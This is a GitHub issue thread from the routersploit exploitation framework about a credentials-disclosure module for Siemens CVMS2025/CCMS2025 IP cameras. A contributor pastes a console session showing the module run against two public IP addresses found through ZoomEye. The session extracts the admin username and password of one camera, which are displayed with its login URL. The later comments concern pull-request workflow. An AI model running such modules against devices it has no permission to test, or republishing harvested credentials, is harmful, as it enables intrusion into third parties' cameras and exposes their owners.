threat9 / routersploit

Exploitation Framework for Embedded Devices

SIEMENS IP-Camera CVMS2025-IR / CCMS2025 - Credentials Disclosure #294

Closed meoww-bot closed 7 years ago

meoww-bot commented 7 years ago

FROM #242

SIEMENS IP-Camera CVMS2025-IR / CCMS2025 - Credentials Disclosure https://www.exploit-db.com/exploits/40254/

I've finished.

I found a vulnerable IP from ZoomEye to verify the module:

[$] <git:(CVMS2025_creds_disclosure)> ./rsf.py 
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
     Router Exploitation Framework   |_|

 Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
 Codename : Bad Blood
 Version  : 2.2.1

 Exploits: 118 Scanners: 29 Creds: 13

rsf > use 
creds     exploits  scanners  
rsf > use exploits/
exploits/cameras/  exploits/misc/     exploits/routers/  
rsf > use exploits/cameras/
exploits/cameras/brickcom/     exploits/cameras/multi/
exploits/cameras/dlink/        exploits/cameras/siemens/
exploits/cameras/grandstream/  exploits/cameras/videoiq/
exploits/cameras/honeywell/    
rsf > use exploits/cameras/siemens/CVMS2025_credentials_disclosure
rsf (SIEMENS IP-Camera CCMS2025 Password Disclosure) > show options
Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target port                                

rsf (SIEMENS IP-Camera CCMS2025 Password Disclosure) > set target 88.74.119.183
[+] {'target': '88.74.119.183'}
rsf (SIEMENS IP-Camera CCMS2025 Password Disclosure) > run
[*] Running module...
[-] Exploit failed - target seems to be not vulnerable
rsf (SIEMENS IP-Camera CCMS2025 Password Disclosure) > set target 91.114.27.164
[+] {'target': '91.114.27.164'}
rsf (SIEMENS IP-Camera CCMS2025 Password Disclosure) > run
[*] Running module...
[+] Target seems to be vulnerable
var Adm_ID="admin";
var Adm_Pass1="admin";
var Adm_Pass2="admin";
var Language="en";
var Logoff_Time="0";

please login at:
http://91.114.27.164:80/cgi-bin/chklogin.cgi

0BuRner commented 7 years ago

Don't you have to create a new pull request for this instead of a new issue? =)

When you have created a new branch with some changes, simply go to the routersploit GitHub project main page and a new green button "Create pull request" will appear and will let you create a new pull request based on a specific branch ;)

meoww-bot commented 7 years ago

OK, but he wrote "Create new issue with given exploit and assign yourself to it", so I tried to create an issue but I can't assign myself to it. I've finished several modules, I'll create a pull request later. Could you review my code if you have spare time?

fwkz commented 7 years ago

@VegetableCat Please create a new PR regarding this issue. 👍

meoww-bot commented 7 years ago

@fwkz done... #296. BTW, could you please review #287? Thanks!

busyb0x commented 7 years ago

Could you please help me with a link to a tutorial on how to perform this? I am a noob trying to understand, please help!

ghost commented 7 years ago

@adydezai Here is the usage wiki: https://github.com/reverse-shell/routersploit/wiki/Usage

lucyoa commented 7 years ago

Good job